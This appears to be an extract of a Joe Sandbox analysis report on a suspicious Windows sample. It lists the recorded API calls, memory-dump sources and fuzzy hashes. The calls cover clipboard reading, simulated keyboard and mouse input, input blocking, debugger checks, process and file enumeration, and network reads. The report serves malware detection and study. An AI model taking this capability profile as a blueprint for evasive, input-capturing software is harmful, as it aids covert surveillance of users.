                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 00475657
                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 0047567B
                                                                                                                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2547909840-0
                                                                                                                                                                                                                • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                                                                                                                                • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                                                                                                                                                                                • FindClose.KERNEL32(?), ref: 004525FF
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                                                                                                                                                                                • String ID: *.*$\VH
                                                                                                                                                                                                                • API String ID: 2786137511-2657498754
                                                                                                                                                                                                                • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                                                                                                                                • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                • String ID: pqI
                                                                                                                                                                                                                • API String ID: 2579439406-2459173057
                                                                                                                                                                                                                • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                                                                                                                                                • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00433349
                                                                                                                                                                                                                • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00433375
                                                                                                                                                                                                                • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: __wcsicollmouse_event
• String ID: DOWN
• API String ID: 1033544147-711622031
• Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
• Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
• Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
• Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
APIs
• GetKeyboardState.USER32(?), ref: 0044C3D2
• SetKeyboardState.USER32(00000080), ref: 0044C3F6
• PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
• PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
• SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: KeyboardMessagePostState$InputSend
• String ID:
• API String ID: 3031425849-0
• Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
• Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
• Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
• Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
APIs
  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
• socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
• WSAGetLastError.WSOCK32(00000000), ref: 00476692
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: ErrorLastinet_addrsocket
• String ID:
• API String ID: 4170576061-0
• Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
• Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
• Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
• Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
APIs
  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
• IsWindowVisible.USER32 ref: 0047A368
• IsWindowEnabled.USER32 ref: 0047A378
• GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
• IsIconic.USER32 ref: 0047A393
• IsZoomed.USER32 ref: 0047A3A1
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
• Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
• Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
• Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
• Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
APIs
  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
• CoInitialize.OLE32(00000000), ref: 00478442
• CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
• CoUninitialize.OLE32 ref: 0047863C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: CreateInitializeInstanceUninitialize_wcslen
• String ID: .lnk
• API String ID: 886957087-24824748
• Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
• Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
• Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
• Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
APIs
• OpenClipboard.USER32(?), ref: 0046DCE7
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
• GetClipboardData.USER32(0000000D), ref: 0046DD01
• CloseClipboard.USER32 ref: 0046DD0D
• GlobalLock.KERNEL32(00000000), ref: 0046DD37
• CloseClipboard.USER32 ref: 0046DD41
• IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
• GetClipboardData.USER32(00000001), ref: 0046DD8D
• CloseClipboard.USER32 ref: 0046DD99
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 15083398-0
                                                                                                                                                                                                                • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                                                                                                                                                • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _memmove
                                                                                                                                                                                                                • String ID: U$\
                                                                                                                                                                                                                • API String ID: 4104443479-100911408
                                                                                                                                                                                                                • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                                                                                                                                                                • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                                                                                                                                                                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3541575487-0
                                                                                                                                                                                                                • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                                                                                                                                                                • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 004339EB
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileFind$AttributesCloseFirst
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 48322524-0
                                                                                                                                                                                                                • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                                                                                                                                                • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                                                                                                                                                                                • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                                                                                                                                                                                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 901099227-0
                                                                                                                                                                                                                • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                                                                                                                                                                                • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Proc
• String ID:
• API String ID: 2346855178-0
• Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
• Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
• Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
• Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
APIs
• BlockInput.USER32(00000001), ref: 0045A38B
Similarity
• API ID: BlockInput
• String ID:
• API String ID: 3456056419-0
• Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
• Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
• Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
• Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
APIs
